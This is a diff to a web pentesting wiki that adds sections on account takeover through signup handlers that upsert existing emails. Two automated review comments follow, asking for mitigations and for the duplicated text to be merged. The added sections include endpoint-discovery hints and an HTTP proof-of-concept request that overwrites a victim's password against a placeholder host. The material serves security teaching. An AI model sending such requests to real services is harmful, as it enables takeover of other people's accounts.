diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md index 44a7aafee..8b36e86ce 100644 --- a/src/pentesting-web/registration-vulnerabilities.md +++ b/src/pentesting-web/registration-vulnerabilities.md @@ -178,8 +178,33 @@ JSON Web Token might be used to authenticate an user. hacking-jwt-json-web-tokens.md {{#endref}} +## Registration-as-Reset (Upsert on Existing Email) + +Some signup handlers perform an upsert when the provided email already exists. If the endpoint accepts a minimal body with an email and password and does not enforce ownership verification, sending the victim's email will overwrite their password pre-auth. + +- Discovery: harvest endpoint names from bundled JS (or mobile app traffic), then fuzz base paths like /parents/application/v4/admin/FUZZ using ffuf/dirsearch. +- Method hints: a GET returning messages like "Only POST request is allowed." often indicates the correct verb and that a JSON body is expected. +- Minimal body observed in the wild: + +```json +{"email":"victim@example.com","password":"New@12345"} +``` + +Example PoC: + +```http +POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1 +Host: www.target.tld +Content-Type: application/json + +{"email":"victim@example.com","password":"New@12345"} +``` + +Impact: Full Account Takeover (ATO) without any reset token, OTP, or email verification. + ## References +- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1) - [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover) {{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md index 363d27e32..92b94bbb8 100644 --- a/src/pentesting-web/reset-password.md +++ b/src/pentesting-web/reset-password.md 
@@ -287,10 +287,25 @@ Mitigations: - Never expose skipOldPwdCheck paths to unauthenticated users; enforce authentication for regular password changes and verify the old password. - Invalidate all active sessions and reset tokens after a password change. +## Registration-as-Password-Reset (Upsert on Existing Email) + +Some applications implement the signup handler as an upsert. If the email already exists, the handler silently updates the user record instead of rejecting the request. When the registration endpoint accepts a minimal JSON body with an existing email and a new password, it effectively becomes a pre-auth password reset without any ownership verification allowing full account takeover. + +Pre-auth ATO PoC (overwriting an existing user's password): + +```http +POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1 +Host: www.target.tld +Content-Type: application/json + +{"email":"victim@example.com","password":"New@12345"} +``` + + ## References - [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token) - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/) +- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1) {{#include ../banners/hacktricks-training.md}} -
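Review bot: the new "Registration-as-Reset" section in registration-vulnerabilities.md has no mitigation guidance, unlike the surrounding reset-password.md material whose context lines open with "Mitigations:"; add a short "Mitigations:" list after the "Impact:" line, e.g. reject (or respond generically to) signups for an email that already exists rather than updating the record, and require ownership verification (verified email or an authenticated session) before any write to an existing user. The "Discovery" bullet and the PoC also hardcode a program-specific path (`/parents/application/v4/admin/FUZZ`, `doRegistrationEntries`); since the page already uses `www.target.tld` and `victim@example.com` as placeholders, either generalise the path (e.g. `/api/FUZZ` with a note that the real-world case used `/parents/application/v4/admin/`) or mark it explicitly as taken from the referenced write-up so readers do not mistake it for a generic endpoint name.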
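Review bot: the "Registration-as-Password-Reset" section added to reset-password.md duplicates the PoC and most of the prose of the section added in the same patch to registration-vulnerabilities.md; keep one canonical copy and cross-reference the other with the `{{#ref}} ... {{#endref}}` pattern the page already uses for hacking-jwt-json-web-tokens.md, so the two do not drift apart. In the first paragraph, "without any ownership verification allowing full account takeover" needs a comma before "allowing" (or "which allows"), and the two blank lines left before "## References" should be collapsed to one to match the rest of the file. As with the sibling hunk, a "Mitigations:" line (reject or generically answer duplicate-email signups; never update an existing record from an unauthenticated registration request; invalidate sessions and reset tokens on any password change, as the context lines above already state) would make the section consistent with the rest of this page.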